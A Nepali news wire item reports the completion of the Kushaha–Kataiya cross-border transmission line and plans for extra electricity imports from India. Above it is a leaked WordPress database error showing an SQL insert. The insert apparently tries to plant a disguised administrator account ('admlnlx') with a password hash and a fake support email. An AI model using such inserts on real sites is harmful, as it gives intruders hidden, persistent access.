WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BenGNIYoinPZ3fYp4R5CuQ5IrMphWr0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:11:48', '', 'admlnlx', 'admlnlx')
काठमाडौँ, माघ २९–
भारतबाट विद्युत् आयात गर्ने महत्वपूर्ण प्रसारण लाइनका रुपमा लिइएको कुशाहा–कटैया अन्तरदेशीय प्रसारण लाइनको निर्माण सम्पन्न भएको छ ।
नेपाल विद्युत् प्राधिकरणका अनुसार सो प्रसारण लाइनको सिङ्गल फेजलाई डलब फेजमा रुपान्तरण गर्नेदेखि क्षमता अभिवृद्धि गर्ने कामसमेत सम्पन्न भएको छ । प्राधिकरणका प्रवक्ता प्रबल अधिकारीले उक्त प्रसारण लाइन निर्माण सम्पन्न भएको र थप विद्युत् आयातमा मार्ग प्रशस्त भएको जानकारी दिनुभयो । भारत सरकारको अनुदान सहयोगमा निर्माण सम्पन्न भएको सो आयोजना पूर्वक्षेत्रमा विद्युत् आयात तथा निर्यातका लागि महत्वपूर्ण मानिएको छ ।
नेपाल र भारतबीच भएको सहमतिअनुसार सो प्रसारण लाइनबाट थप ५० मेगावाट विद्युत् आयात गरिनेछ । थप विद्युत् आयात भएपछि प्राधिकरणले झापा, मोरङ र सुनसरीमा विद्युत्भार कटौती अन्त्य गर्ने तयारीसमेत गरेको छ ।
यस्तै दुहबीमा रहेको मल्टी फ्यूल प्लान्टको ३३ केभी क्षमताको प्रसारण लाइनलाई पनि थप मर्मत गरेर विराटनगरको औद्योगिक करिडोरमा थप विद्युत् उपलब्ध गराउने तयारी गरिएको छ ।
यस्तै रक्सौल परवानीपुर प्रसारण लाइनको काम पनि अन्तिम चरणमा पुगेको छ । सो प्रसारण लाइनबाट थप ५० मेगावाट विद्युत् आयात गर्ने तयारी गरिएको छ । थप विद्युत् आयात भएपछि वीरगन्ज औद्योगिक कोरिडोरलगायतका क्षेत्रमा पनि विद्युत्भार कटौती अन्त्य गरिनेछ ।
थप विद्युत् आयातका सम्बन्धमा यसअघि भएको सहमतिलाई केही दिनभित्रै बस्ने नेपाल–भारत ऊर्जा सचिवस्तरीय संयुक्त बैठकले थप अनुमोदन गर्ने प्राधिकरणले जनाएको छ । –रासस